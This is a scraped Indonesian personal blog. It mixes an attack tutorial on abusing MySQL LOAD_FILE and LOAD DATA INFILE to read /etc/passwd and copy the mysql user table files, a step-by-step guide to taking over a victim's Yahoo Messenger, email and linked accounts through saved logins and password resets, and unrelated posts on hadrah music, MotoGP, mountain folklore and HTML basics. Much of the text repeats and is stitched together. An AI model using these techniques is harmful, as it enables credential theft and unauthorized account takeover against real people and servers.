menjadikannya file. Ini adalah salah
satu contohnya dengan
PHP //------------------- code
--------------------------------// //------------------- code
--------------------------------//
Setelah anda menjalankan script php
tadi, lihatlah di direktori script itu
berada. Disana akan terdapat 3 file
yakni user.frm , user.MYD dan
user.MYI. Kita juga dapat
mengambil isi database ini melalui
MySQL GUI atau tool-tool
sejenisnya. ---// Catatan Sebagai
catatan, hal ini MUNGKIN tidak dapat
dilakukan pada sistem operasi
keluarga Unix atau GNU/LINUX
karena seperti yang saya telah
sampaikan tadi, fungsi-fungsi
tersebut hanya dapat membaca file
yang bisa dibaca oleh semua user.
Karena sepengetahuan saya default
di sistem operasi Windows hak
akses membaca pada direktori
MySQL dapat dilakukan oleh hampir
semua user. Berbeda dengan sistem
operasi keluarga Unix atau GNU/
Linux dan sejenisnya yang
sepengetahuan saya defaultnya
memiliki hak akses seperti berikut
ini : -rw-rw---- 1 mysql mysql 248
2006-10-31 00:10 user.MYD -rw-
rw---- 1 mysql mysql 2048
2006-10-31 00:10 user.MYI -rw-
rw---- 1 mysql mysql 10330
2006-10-30 23:58 user.frm File - file
tersebut bisa saja diakses melalui
fungsi-fungsi tersebut jika memiliki
hak akses sebagai berikut : -rw-rw-
rw- 1 mysql mysql 248 2006-10-31
00:10 user.MYD -rw-rw-rw- 1
mysql mysql 2048 2006-10-31 00:10
user.MYI -rw-rw-rw- 1 mysql
mysql 10330 2006-10-30 23:58
user.frm ---// Penutup Selamat
mencoba menggunakan MySQL
sebagai hacking tools, semoga
artikel ini dapat berguna bagi kita
semua. ---// Referensi - MySQL
Manual http://www.mysql.com -
PHP Manual http://www.php.net
kali ini saya akan mencoba
mengajak anda menggunakan
MySQL menjadi sebuah tools
hacking menggunakan 2 fungsi
yang ada dalam MySQL. ---//
Keterangan & Contoh Penggunaan
LOAD_FILE() & LOAD DATA INFILE
Fungsi yang kita akan gunakan
adalah load_file() dan LOAD DATA
INFILE, berikut ini adalah
keterangannya - LOAD_FILE()
Dengan fungsi ini, kita dapat
membaca file-file yang terdapat
pada server MySQL tersebut dan
menampilkannya ke layar.
Contoh : //--- query ----// mysql>
SELECT LOAD_FILE('/etc/passwd');
atau mysql> SELECT LOAD_FILE('c:/
boot.ini'); //--- query ----// Maka
akan menampilkan isi dari file
passwd atau file boot.ini - LOAD
DATA INFILE Dengan fungsi ini, kita
dapat mengambil isi file dan
menaruhnya kedalam database;
Contoh : //--- query ----// mysql>
LOAD DATA INFILE '/etc/passwd'
INTO TABLE namatable; atau
mysql> LOAD DATA INFILE 'c:/
boot.ini' INTO TABLE
namatable; //--- query ----// Maka
perintah tersebut akan mengambil
isi file passwd atau file boot.ini dan
menaruhnya ke tabel namatable.
Dengan fungsi-fungsi
tersebut,kemungkinan kita juga
dapat mengambil file-file database
(.MYI,.frm,.MYD) dari server
tersebut selama file-file tersebut
BISA DIBACA OLEH SEMUA USER.
---// Mengapa mengambil file-file
tersebut ? Sebenarnya anda bisa
saja mengambil file-file yang lain,
tetapi jika user mysql anda tidak
diizinkan untuk mengakses database
mysql, anda dapat menggunakan
langkah-langkah ini. Contoh : Misal :
- Sistem operasi target adalah
Windows - Direktori MySQL ada di
C:\MySQL Langkah yang kita lakukan
sebelumnya adalah mencoba untuk
membuat - Database dengan nama
db_dudulz - Tabel dengan nama
tbl_dudulz yang memiliki field
fl_namafile dengan tipe data varchar
dan field fl_content dengan tipe data
longblob; //--- query ----// mysql>
create database db_dudulz; mysql>
use db_dudulz; mysql> create table
tbl_dudulz (fl_namafile varchar
(20),fl_content longblob); //--- query
----// Setelah itu kita akan
mengambil isi file .MYI,.frm,.MYD
dari direktori C:\MySQL\data\mysql
\, dalam hal ini kita hanya
mengambil file table user yakni file
user.frm, user.MYI, user.MYD . //---
query ----// mysql> insert into
tbl_dudulz values ('user.frm',load_file
('c:\\MySQL\\data\\mysql\
\user.frm')); mysql> insert into
tbl_dudulz values ('user.MYI',load_file
('c:\\MySQL\\data\\mysql\
\user.MYI')); mysql> insert into
tbl_dudulz values
('user.MYD',load_file('c:\\MySQL\
\data\\mysql\\user.MYD')); //---
query ----// ---// Ambil Isi File
Setelah berhasil memasukkan isi dari
file-file tersebut anda dapat
mengambil isi file tersebut dari
database db_dudulz tadi dan
menjadikannya file. Ini adalah salah
satu contohnya dengan
PHP //------------------- code
--------------------------------// //------------------- code
--------------------------------//
Setelah anda menjalankan script php
tadi, lihatlah di direktori script itu
berada. Disana akan terdapat 3 file
yakni user.frm , user.MYD dan
user.MYI. Kita juga dapat
mengambil isi database ini melalui
MySQL GUI atau tool-tool
sejenisnya. ---// Catatan Sebagai
catatan, hal ini MUNGKIN tidak dapat
dilakukan pada sistem operasi
keluarga Unix atau GNU/LINUX
karena seperti yang saya telah
sampaikan tadi, fungsi-fungsi
tersebut hanya dapat membaca file
yang bisa dibaca oleh semua user.
Karena sepengetahuan saya default
di sistem operasi Windows hak
akses membaca pada direktori
MySQL dapat dilakukan oleh hampir
semua user. Berbeda dengan sistem
operasi keluarga Unix atau GNU/
Linux dan sejenisnya yang
sepengetahuan saya defaultnya
memiliki hak akses seperti berikut
ini : -rw-rw---- 1 mysql mysql 248
2006-10-31 00:10 user.MYD -rw-
rw---- 1 mysql mysql 2048
2006-10-31 00:10 user.MYI -rw-
rw---- 1 mysql mysql 10330
2006-10-30 23:58 user.frm File - file
tersebut bisa saja diakses melalui
fungsi-fungsi tersebut jika memiliki
hak akses sebagai berikut : -rw-rw-
rw- 1 mysql mysql 248 2006-10-31
00:10 user.MYD -rw-rw-rw- 1
mysql mysql 2048 2006-10-31 00:10
user.MYI -rw-rw-rw- 1 mysql
mysql 10330 2006-10-30 23:58
user.frm ---// Penutup Selamat
mencoba menggunakan MySQL
sebagai hacking tools, semoga
artikel ini dapat berguna bagi kita
semua. ---// Referensi - MySQL
Manual http://www.mysql.com -
PHP Manual http://www.php.net
log book
Artikel ini akan memaparkan kepada
anda tentang kecerobohan-
kecerobohan yang sering terjadi
dikalangan para netter. Kita akan
memanfaatkan beberapa kebiasaan
buruk yang sering kali dilakukan
untuk mengambil alih account
mereka tanpa menggunakan tools
apapun seperti exploit atau
keylogger. Sebagai contoh adalah
penggunaan Yahoo! Messenger
dengan kondisi korban memberi
mengaktifkan opsi Remember My ID
& Password atau korban lupa tidak
melakukan Sign Out Permasalahan
yang ditemukan adalah - Bagaimana
cara mengetahui karakter dibalik
simbol bintang pada form
password? - Bagaimana cara
mendapakan account-account lain
yang berhubungan dengan si
korban? Sebagai ilustrasi, perhatikan
screenshot berikut: http://
www.freewebtown.com/
spyro_zone/ym_ready.JPG Yahoo ID
dan Password sudah di depan
mata. Tapi passwordnya tertutup
karakter bintang. Menyalin
passwordnya ke Text Editor tidak
dapat dilakukan karena Form
Password tidak mengizinkan aksi
tersebut. Lalu bagaimana? Berikut
langkah-langkah yang sebaiknya
anda lakukan (atau SEBAIKNYA
TIDAK ANDA LAKUKAN): - Sign In
saja dengan ID dan Password yang
telah terisi itu. - Setelah berhasil klik
tab Over View yang dimiliki YM lalu
klik 2x pada sub menu Yahoo Mail.
http://www.freewebtown.com/
spyro_zone/oview1.bmp http://
www.freewebtown.com/
spyro_zone/oview2.bmp Akan
muncul kotak Popup konfirmasi
yang menanyakan apakah anda
ingin otomatis Login ke Yahoo Mail.
Klik Yes & Yes pada kotak konfirmasi
kedua. Nah kini Yahoo Mail Korban
juga terbuka di hadapan anda
dengan indahnya. Jangan keburu
senang dulu, jelajahi inbox korban.
Cari info-info menarik. Ketik
keyword Account atau Password
pada form search mail. Jika anda
beruntung, maka email yang berisi
informasi Account lain sang korban
akan ditampilkan. Jelajahi email-
email sensitif tersebut. Jika anda
menemukan sebuah email yang
berisi Username dan Password,
catat passwordnya. Biasanya user
malas akan memakai password
yang sama untuk setiap
accountnya. Dan kini semua
account korban sudah jadi milik
anda. Anda tidak menemukan email
berisi Username dan Password?
Jelajahi email korban. Apakah dia
bergabung dengan newsgroup,
forum atau situs tertentu. Misalnya
anda menemukan bahwa korban
adalah angota Friendster. Segera
arahkan Browser anda menuju situs
Friendster lalu pilih opsi Forgot
Password dan isikan alamat email
korban di sana. Tunggu beberapa
saat dan Friendster akan
mengirimkan password si korban
kepada anda. Dan kini, sperti yang
saya katakan tadi bahwa biasanya
user malas akan memakai
password yang sama untuk semua
accountnya. Maka (hehehe.. lagi-lagi
saya katakan) anda telah memiliki
kuasa penuh atas (hampir) semua
accountnya. Hal seperti diatas juga
dapat anda terapkan ketika si korban
lupa melakukan sign out. Sangat
mudah bukan, dan hasilnya cukup
luar biasa. Bisakah anda bayangkan
jika si korban memiliki account
paypal? Atau mungkin si korban
adalah webmaster suatu situs?
anda tentang kecerobohan-
kecerobohan yang sering terjadi
dikalangan para netter. Kita akan
memanfaatkan beberapa kebiasaan
buruk yang sering kali dilakukan
untuk mengambil alih account
mereka tanpa menggunakan tools
apapun seperti exploit atau
keylogger. Sebagai contoh adalah
penggunaan Yahoo! Messenger
dengan kondisi korban memberi
mengaktifkan opsi Remember My ID
& Password atau korban lupa tidak
melakukan Sign Out Permasalahan
yang ditemukan adalah - Bagaimana
cara mengetahui karakter dibalik
simbol bintang pada form
password? - Bagaimana cara
mendapakan account-account lain
yang berhubungan dengan si
korban? Sebagai ilustrasi, perhatikan
screenshot berikut: http://
www.freewebtown.com/
spyro_zone/ym_ready.JPG Yahoo ID
dan Password sudah di depan
mata. Tapi passwordnya tertutup
karakter bintang. Menyalin
passwordnya ke Text Editor tidak
dapat dilakukan karena Form
Password tidak mengizinkan aksi
tersebut. Lalu bagaimana? Berikut
langkah-langkah yang sebaiknya
anda lakukan (atau SEBAIKNYA
TIDAK ANDA LAKUKAN): - Sign In
saja dengan ID dan Password yang
telah terisi itu. - Setelah berhasil klik
tab Over View yang dimiliki YM lalu
klik 2x pada sub menu Yahoo Mail.
http://www.freewebtown.com/
spyro_zone/oview1.bmp http://
www.freewebtown.com/
spyro_zone/oview2.bmp Akan
muncul kotak Popup konfirmasi
yang menanyakan apakah anda
ingin otomatis Login ke Yahoo Mail.
Klik Yes & Yes pada kotak konfirmasi
kedua. Nah kini Yahoo Mail Korban
juga terbuka di hadapan anda
dengan indahnya. Jangan keburu
senang dulu, jelajahi inbox korban.
Cari info-info menarik. Ketik
keyword Account atau Password
pada form search mail. Jika anda
beruntung, maka email yang berisi
informasi Account lain sang korban
akan ditampilkan. Jelajahi email-
email sensitif tersebut. Jika anda
menemukan sebuah email yang
berisi Username dan Password,
catat passwordnya. Biasanya user
malas akan memakai password
yang sama untuk setiap
accountnya. Dan kini semua
account korban sudah jadi milik
anda. Anda tidak menemukan email
berisi Username dan Password?
Jelajahi email korban. Apakah dia
bergabung dengan newsgroup,
forum atau situs tertentu. Misalnya
anda menemukan bahwa korban
adalah angota Friendster. Segera
arahkan Browser anda menuju situs
Friendster lalu pilih opsi Forgot
Password dan isikan alamat email
korban di sana. Tunggu beberapa
saat dan Friendster akan
mengirimkan password si korban
kepada anda. Dan kini, sperti yang
saya katakan tadi bahwa biasanya
user malas akan memakai
password yang sama untuk semua
accountnya. Maka (hehehe.. lagi-lagi
saya katakan) anda telah memiliki
kuasa penuh atas (hampir) semua
accountnya. Hal seperti diatas juga
dapat anda terapkan ketika si korban
lupa melakukan sign out. Sangat
mudah bukan, dan hasilnya cukup
luar biasa. Bisakah anda bayangkan
jika si korban memiliki account
paypal? Atau mungkin si korban
adalah webmaster suatu situs?
25 April 2010
Sejarah Hadrah Albanjari
Seni terbang al-Banjari adalah sebuah kesenian khas islami yang berasal dari Kalimantan. Iramanya yang menghentak, rancak dan variatif membuat kesenian ini masih banyak digandrungi oleh pemuda-pemudi hingga sekarang. Seni jenis ini bisa disebut pula aset atau ekskul terbaik di pondok-pondok pesantren Salafiyah. Sampai detik ini seni hadrah yang berasal dari kota Banjar ini bisa dibilang paling konsisten dan paling banyak diminati oleh kalangan santri, bahkan saat ini di beberapa kampus mulai ikut menyemarakkan jenis musik ini.
Hadrah Al-Banjari masih merupakan jenis musik rebana yang mempunyai keterkaitan sejarah pada masa penyebaran agama Islam oleh Sunan Kalijaga, Jawa. Karena perkembangannya yang menarik, kesenian ini seringkali digelar dalam acara-acara seperti maulid nabi, isra' mi'raj atau hajatan semacam sunatan dan pernikahan. Alat rebananya sendiri berasal dari daerah Timur Tengah dan dipakai untuk acara kesenian. Kemudian alat musik ini semakin meluas perkembangannya hingga ke Indonesia, mengalami penyesuaian dengan musik-musik tradisional baik seni lagu yang dibawakan maupun alat musik yang dimainkan. Demikian pula musik gambus, kasidah dan hadroh adalah termasuk jenis kesenian yang sering menggunakan rebana.
Keunikan musik rebana termasuk banjari adalah hanya terdapat satu alat musik yaitu rebana yang dimainkan dengan cara dipukul secara langsung oleh tangan pemain tanpa menggunakan alat pemukul. Musik ini dapat dimainkan oleh siapapun untuk mengiringi nyanyian dzikir atau sholawat yang bertemakan pesan-pesan agama dan juga pesan-pesan sosial budaya. Umumnya menggunakan bahasa Arab, tapi belakangan banyak yang mengadopsi bahasa lokal untuk kresenian ini.
Jadi, sebagai generasi penerus kita harusnya berbangga hati karena dapat menjaga apa yang telah di ajarkan oleh nabi sebelumnya. Akhirnya, mari kita bersama melestarikan kesenian islami ini. Toh nabi juga tidak pernah melarang 'seni'. Kita jadikan rebana ini sebagai wahana untuk menggapai cinta-Nya serta meraih syafaatnya sehingga kelak menjadi ummat yang selamat.
Hadrah Al-Banjari masih merupakan jenis musik rebana yang mempunyai keterkaitan sejarah pada masa penyebaran agama Islam oleh Sunan Kalijaga, Jawa. Karena perkembangannya yang menarik, kesenian ini seringkali digelar dalam acara-acara seperti maulid nabi, isra' mi'raj atau hajatan semacam sunatan dan pernikahan. Alat rebananya sendiri berasal dari daerah Timur Tengah dan dipakai untuk acara kesenian. Kemudian alat musik ini semakin meluas perkembangannya hingga ke Indonesia, mengalami penyesuaian dengan musik-musik tradisional baik seni lagu yang dibawakan maupun alat musik yang dimainkan. Demikian pula musik gambus, kasidah dan hadroh adalah termasuk jenis kesenian yang sering menggunakan rebana.
Keunikan musik rebana termasuk banjari adalah hanya terdapat satu alat musik yaitu rebana yang dimainkan dengan cara dipukul secara langsung oleh tangan pemain tanpa menggunakan alat pemukul. Musik ini dapat dimainkan oleh siapapun untuk mengiringi nyanyian dzikir atau sholawat yang bertemakan pesan-pesan agama dan juga pesan-pesan sosial budaya. Umumnya menggunakan bahasa Arab, tapi belakangan banyak yang mengadopsi bahasa lokal untuk kresenian ini.
Jadi, sebagai generasi penerus kita harusnya berbangga hati karena dapat menjaga apa yang telah di ajarkan oleh nabi sebelumnya. Akhirnya, mari kita bersama melestarikan kesenian islami ini. Toh nabi juga tidak pernah melarang 'seni'. Kita jadikan rebana ini sebagai wahana untuk menggapai cinta-Nya serta meraih syafaatnya sehingga kelak menjadi ummat yang selamat.
24 April 2010
Letusan Gunung Api, MotoGPJepang Ditunda
Tokyo, Gelaran
MotoGP Jepang yang bakal
dilangsungkan di Sirkuit Motegi 25
April mendatang ditunda,
menyusul letusan gunung api di
Islandia yang membuat jadwal
penerbangan di Eropa terganggu.
Dalam beberapa hari terakhir,
penerbangan di Eropa mengalami
gangguan akibat letusan gunung
Eyjafjallajokull di Islandia. Awan
debu hasil letusan pun menyelimuti
sebagian langit di Benua Biru. Hal
ini membuat jadwal penerbangan
di Eropa terganggu. Banyak di
antaranya bahkan dibatalkan.
Kondisi tersebut membuat gelaran
MotoGP di Motegi pada 25 April
diundur. "Kami telah menerima
konfirmasi bahwa balapan
ditunda," demikian dikatakan
pengelola sirkuit Motegi, Kazunari
Kinebuchi di Reuters.
Pihak MotoGP dan International
Motorcycling Federation (FIM) akan
mengeluarkan pernyataan resmi
soal hal ini pada Senin (19/4/2010).
Belum ada jadwal baru untuk
Motegi. Seri balapan akan langsung
dilanjutkan ke Jerez, Spanyol pada
2 Mei. Seperti dilansir dari
Motorcyclenews, jadwal baru bagi
MotoGP Jepang menurut rencana
adalah 3 Oktober.
21 April 2010
REGAS'S MERAUNG
19 April 2010
Misteri Gunung Raung
Raung sudah terlihat
dari nama-nama pos
pendakian yang ada,
mulai dari Pondok
Sumur, Pondok
Demit, Pondok Mayit
dan Pondok Angin.
Semua itu
mempunyai sejarah
tersendiri hingga
dinamakan
demikian.
Image
Pondok Sumur
misalnya, katanya
terdapat sebuah
sumur yang biasa
digunakan seorang
pertapa sakti asal
Gresik. Sumur dan
pertapa itu dipercaya
masih ada, hanya
saja tak kasat mata.
Di Pondok Sumur
ini, saat
berkemah,juga
terdengar suara
derap kaki kuda
yang seakan
melintas di belakang
tenda.
Selanjutnya Pondok
Demit, disinilah
tempat aktivitas jual-
beli para lelembut
atau dikenal dengan
Parset (Pasar Setan).
Sehingga,
padaMore… hari-hari
tertentu akan
terdengar keramaian
pasar yang sering
diiringi dengan
alunan musik. Lokasi
pasar setan terletak
disebelah timur jalur,
sebuah lembah
dangkal yang hanya
dipenuhi ilalang
setinggi perut dan
pohon perdu.
Pondok Mayit adalah
pos yang sejarahnya
paling
menyeramkan,
karena dulu pernah
ditemukan sesosok
mayat yang
menggantung di
sebuah pohon.
Mayat itu adalah
seorang bangsawan
Belanda yang
dibunuh oleh para
pejuang saat itu.
Tak jauh dari
Pondok Mayit,
adalah Pondok
Angin yang juga
merupakan pondok
terakhir atau base
camp pendaki.
Tempat ini
menyajikan
pemandangan yang
memukau karena
letaknya yang
berada di puncak
bukit, sehingga kita
dapat menyaksikan
pemandangan alam
pegunungan yang
ada disekitarnya.
Gemerlapnya kota
Bondowoso dan
Situbondo serta
sambaran kilat jika
kota itu mendung,
menjadi fenomena
alam yang sangat
luar biasa. Namun,
angin bertiup sangat
kencang dan seperti
maraung-raung di
pendengaran.
Karenanya gunung
ini dinamakan
Raung, suara
anginnya yang
meraung di telinga
terkadang dapat
menghempaskan
kita didasar jurang
yang terjal.
1 April 2010
Dasar HTML
OBJEKTIF:
Setelah mempelajari materi ini
diharapkan anda dapat memahami
struktur dasar dari dokumen HTML.
MATERI:
Struktur dasar dokumen HTML(Tag,
Element, Attribute), Element HTML,
Element HEAD, Element TITLE,
Element BODY.
STRUKTUR DASAR DOKUMEN
HTML
HTML merupakan singkatan dari
HyperText Markup Language
adalah script untuk menyusun
dokumen-dokumen Web.
Dokumen HTML disimpan dalam
format teks reguler dan
mengandung tag-tag yang
memerintahkan web browser untuk
mengeksekusi perintah-perintah
yang dispesifikasikan.
Struktur dasar dokumen
HTML adalah sebagai berikut:
Disini Judul Dokumen<br />
HTML
Disini penulisan informasi Web
Dari struktur dasar HTML di atas
dapat dijelaskan sebagai berikut:
a. Tag
Adalah teks khusus (markup)
berupa dua karakter " <" dan ">",
sebagai contoh adalah tag
dengan nama body.
Secara umum tag ditulis secara
berpasangan, yang terdiri atas tag
pembuka dan tag penutup
(ditambahkan karakter "/" setelah
karakter "<"), sebagai contoh ini adalah tag pembuka isi
dokumen HTML, dan ini
adalah tag penutup isi dokumen
HTML.
b. Element
Element terdiri atas tiga bagian, yaitu
tag pembuka, isi, dan tag
penutup. Sebagai contoh untuk
menampilkan judul dokumen HTML
pada web
browser digunakan element title,
dimana:
ini adalah tag pembuka judul<br />
dokumen HTML<br />
Disini Judul Dokumen HTML ini<br />
adalah isi judul dokumen HTML<br />
ini adalah tag penutup judul
dokumen HTML
Tag-tag yang ditulis secara
berpasangan pada suatu element
HTML, tidak boleh saling tumpang
tindih dengan pasangan tag-tag
lainnya.
Contoh penulisan tag-tag yang
benar
c. Attribute
Attribute mendefinisikan property
dari suatu element HTML, yang
terdiri atas nama dan nilai.
Penulisannya adalah sebagai berikut:
nama-attr="nilai-attr"
nama-attr="nilai-attr"
.................
>
.................
Secara umum nilai attribute harus
berada dalam tanda petik satu atau
dua. Sebagai contoh, untuk
membuat warna teks menjadi
kuning dan latarbelakang halaman
web menjadi hitam, penulisannya
adalah
d. Element HTML
Menyatakan pada browser
bahwa dokumen Web yang
digunakan adalah HTML.
Sintaks:
..........
e. Element HEAD
Merupakan kepala dari dokumen
HTML. Tag dan tag
terletak di antara tag dan tag
.
Sintaks:
...........
f. Element TITLE
Merupakan judul dari dokumen
HTML yang ditampilkan pada judul
jendela browser. Tag dan tag<br />
terletak di antara tag
dan tag .
Sintaks:
<br />
.........<br />
g. Element BODY
Element ini untuk menampilkan isi
dokumen HTML. Tag dan
tag terletak di bawah tag
dan tag .
Element BODY mempunyai
attribute-attribute yang
menspesifikasikan khususnya warna
dan latarbelakang dokumen yang
akan ditampilkan pada browser.
Sintaks:
..............
Attribute text memberikan warna
pada teks, bgcolor memberikan
warna pada latarbelakang dokumen
HTML, background memberikan
latarbelakang dokumen HTML dalam
bentuk gambar, link memberikan
nilai warna untuk link, alink
memberikan warna untuk link yang
sedang aktif, vlink memberikan
warna untuk link yang telah
dikunjungi.
Jika attribute bgcolor dan
background keduanya
dispesifikasikan maka attribute
background yang akan digunakan,
akan tetapi jika nilai attribute
background (gambar) tidak
ditemukan pada dokumen HTML
maka attribute bgcolor yang akan
digunakan.
LATIHAN
Gunakan teks editor misalkan
"Notepad" untuk menyunting dan
menyimpan script latihan di bawah
ini. Untuk melihat hasilnya bukalah
file tersebut dengan menggunakan
web browser atau gunakan editor
yang telah tersedia pada modul ini
dengan mengklik menu Editor.
Latihan 1:
Menampilkan teks:
Belajar bahasa
pemrograman web ternyata mudah
juga :)
Nama file: latihan1_1.html
Latihan1-1
Belajar bahasa
pemrograman web ternyata
mudah juga :)
Tugas tambahan:
Gantilah teks tersebut dengan teks
lainnya.
Latihan 2:
Merubah warna teks menjadi
merah:
Belajar bahasa
pemrograman web ternyata mudah
juga :)
Nama file: latihan1_2.html
Latihan1-2
Belajar bahasa
pemrograman web ternyata
mudah juga :)
Tugas tambahan:
Cobalah untuk warna: maroon,
black, yellow, white, lime, green,
blue, red, olive, navy, purple, teal,
gray, silver, fuchsia, aqua.
Latihan 3:
Merubah warna background
menjadi hitam.
Nama file: latihan1_3.html
Latihan1-3
Belajar bahasa
pemrograman web ternyata
mudah juga :)
Tugas tambahan:
Cobalah untuk warna: maroon,
black, yellow, white, lime, green,
blue, red, olive, navy, purple, teal,
gray, silver, fuchsia, aqua.
Latihan 4:
Merubah background dengan suatu
gambar.
Nama file: latihan1_4.html
Latihan1-4
Belajar bahasa
pemrograman web ternyata
mudah juga :)
catatan:
./images/ = nama direktori file
gambar disimpan
image027.jpg = nama file
gambar
Tugas tambahan:
Cobalah untuk file gambar:
image050.jpg, image052.jpg,
image058.jp
Setelah mempelajari materi ini
diharapkan anda dapat memahami
struktur dasar dari dokumen HTML.
MATERI:
Struktur dasar dokumen HTML(Tag,
Element, Attribute), Element HTML,
Element HEAD, Element TITLE,
Element BODY.
STRUKTUR DASAR DOKUMEN
HTML
HTML merupakan singkatan dari
HyperText Markup Language
adalah script untuk menyusun
dokumen-dokumen Web.
Dokumen HTML disimpan dalam
format teks reguler dan
mengandung tag-tag yang
memerintahkan web browser untuk
mengeksekusi perintah-perintah
yang dispesifikasikan.
Struktur dasar dokumen
HTML adalah sebagai berikut:
Disini penulisan informasi Web
Dari struktur dasar HTML di atas
dapat dijelaskan sebagai berikut:
a. Tag
Adalah teks khusus (markup)
berupa dua karakter " <" dan ">",
sebagai contoh adalah tag
dengan nama body.
Secara umum tag ditulis secara
berpasangan, yang terdiri atas tag
pembuka dan tag penutup
(ditambahkan karakter "/" setelah
karakter "<"), sebagai contoh ini adalah tag pembuka isi
dokumen HTML, dan ini
adalah tag penutup isi dokumen
HTML.
b. Element
Element terdiri atas tiga bagian, yaitu
tag pembuka, isi, dan tag
penutup. Sebagai contoh untuk
menampilkan judul dokumen HTML
pada web
browser digunakan element title,
dimana:
dokumen HTML
Tag-tag yang ditulis secara
berpasangan pada suatu element
HTML, tidak boleh saling tumpang
tindih dengan pasangan tag-tag
lainnya.
Contoh penulisan tag-tag yang
benar
................
................
c. Attribute
Attribute mendefinisikan property
dari suatu element HTML, yang
terdiri atas nama dan nilai.
Penulisannya adalah sebagai berikut:
nama-attr="nilai-attr"
nama-attr="nilai-attr"
.................
>
.................
Secara umum nilai attribute harus
berada dalam tanda petik satu atau
dua. Sebagai contoh, untuk
membuat warna teks menjadi
kuning dan latarbelakang halaman
web menjadi hitam, penulisannya
adalah
d. Element HTML
Menyatakan pada browser
bahwa dokumen Web yang
digunakan adalah HTML.
Sintaks:
..........
e. Element HEAD
Merupakan kepala dari dokumen
HTML. Tag dan tag
terletak di antara tag dan tag
.
Sintaks:
...........
f. Element TITLE
Merupakan judul dari dokumen
HTML yang ditampilkan pada judul
jendela browser. Tag
dan tag .
Sintaks:
g. Element BODY
Element ini untuk menampilkan isi
dokumen HTML. Tag dan
tag terletak di bawah tag
dan tag .
Element BODY mempunyai
attribute-attribute yang
menspesifikasikan khususnya warna
dan latarbelakang dokumen yang
akan ditampilkan pada browser.
Sintaks:
..............
Attribute text memberikan warna
pada teks, bgcolor memberikan
warna pada latarbelakang dokumen
HTML, background memberikan
latarbelakang dokumen HTML dalam
bentuk gambar, link memberikan
nilai warna untuk link, alink
memberikan warna untuk link yang
sedang aktif, vlink memberikan
warna untuk link yang telah
dikunjungi.
Jika attribute bgcolor dan
background keduanya
dispesifikasikan maka attribute
background yang akan digunakan,
akan tetapi jika nilai attribute
background (gambar) tidak
ditemukan pada dokumen HTML
maka attribute bgcolor yang akan
digunakan.
LATIHAN
Gunakan teks editor misalkan
"Notepad" untuk menyunting dan
menyimpan script latihan di bawah
ini. Untuk melihat hasilnya bukalah
file tersebut dengan menggunakan
web browser atau gunakan editor
yang telah tersedia pada modul ini
dengan mengklik menu Editor.
Latihan 1:
Menampilkan teks:
Belajar bahasa
pemrograman web ternyata mudah
juga :)
Nama file: latihan1_1.html
Belajar bahasa
pemrograman web ternyata
mudah juga :)
Tugas tambahan:
Gantilah teks tersebut dengan teks
lainnya.
Latihan 2:
Merubah warna teks menjadi
merah:
Belajar bahasa
pemrograman web ternyata mudah
juga :)
Nama file: latihan1_2.html
Belajar bahasa
pemrograman web ternyata
mudah juga :)
Tugas tambahan:
Cobalah untuk warna: maroon,
black, yellow, white, lime, green,
blue, red, olive, navy, purple, teal,
gray, silver, fuchsia, aqua.
Latihan 3:
Merubah warna background
menjadi hitam.
Nama file: latihan1_3.html
Belajar bahasa
pemrograman web ternyata
mudah juga :)
Tugas tambahan:
Cobalah untuk warna: maroon,
black, yellow, white, lime, green,
blue, red, olive, navy, purple, teal,
gray, silver, fuchsia, aqua.
Latihan 4:
Merubah background dengan suatu
gambar.
Nama file: latihan1_4.html
Belajar bahasa
pemrograman web ternyata
mudah juga :)
catatan:
./images/ = nama direktori file
gambar disimpan
image027.jpg = nama file
gambar
Tugas tambahan:
Cobalah untuk file gambar:
image050.jpg, image052.jpg,
image058.jp
Langganan:
Postingan (Atom)
My Profile
- Mac Osqy
- Kalibaru, Banyuwangi, Indonesia
- Aku orang nya biasa-biasa aja, kepada siapa aja ramah, santun dan segan... normal-normal aja sepertinya sama seperti yang lain. travelling adalah hoby ku, meski dengan modal pas-pasan dan bondo tekat, lawan aja asal hati senang.... dunia nyata sampai maya pun aku coba tembus dengan sebuah harapan tertentu... hal terburuk yang paling membingungkan adalah target, hmmm... bikin badan Keook aja, ampun deh pokoknya! seni merupakan mainan kecilku tanpa harus tau apa itu C+, C++, binary dan asembly yang menjadi buyut sebuah bahasa... Namanya juga LAMER bisa apa??? tapi aku harus tetap berkarya meski hanya dengan modal mesin dari keluarga Penryn, dan selalu berharap bisa meminang keluarga Clarksfield nantinya.
Pageviews
Popular Posts
-
Berawal dari ngumpul bareng dengan para Neter Penangan Permai di sebuah Rumah di kawasan Jl. H. Randim 50, tanpa disadari salah satu Net... -
Ya Rab.... Hamba meminta binatang mungil nan lucu, tapi Engkau memberiku Ulat berbulu... aku sempat putus asa kala itu. Namun suatu hari Ak...
-
WEP adalah Wired Equivalent Privacy. Ini merupakan standar untuk enkripsi nirkabel sampai sekarang. Banyak orang bahkan tidak menggunakan WE...
-
Feature : *New DXKT7 Very fast and stable *No battery drain *Bravia engine *EXT4 File System *EXT3 support
-
London - Sisa-sisa perahu Nabi Nuh ditemukan di ketinggian 13 ribu kaki atau sekitar 3,9 kilometer di sebuah gunung di Turki. Hal tersebut d...
-
Sebuah advance operator dari google yang banyak kita anggap sebagai New Modern Wisdom mampu memecah berbagai permasalahan, mampu menjaw...
-
REUNI DAN HALAL BI HALAL IKSASS KORCAM KALIBARU IKSASS DAN SIMPATISAN KORCAM KALIBARU akan melaksanakan Reuni dan Halal bi Halal : Hari ...
-
Jaringan GPRS Tentu Anda mengenal handphone (HP) bukan? Apakah keungulan HP dibanding telepon rumah? Tentu jawaban spontan karena sifat mobi...
-
Sebelum kita melangkah lebih lanjut, yang perlu kita pahami adalah konsep awal kenapa kita bisa menikmati internet gratis itu. Alasan utam...
-
Di posting sebelumya telah di muat mengenai jenis koneksi internet dengan jaringan tv kabel, sebelum kita melangkah lebih jauh lagi bermain-...
About
Blogger templates
Blogger news
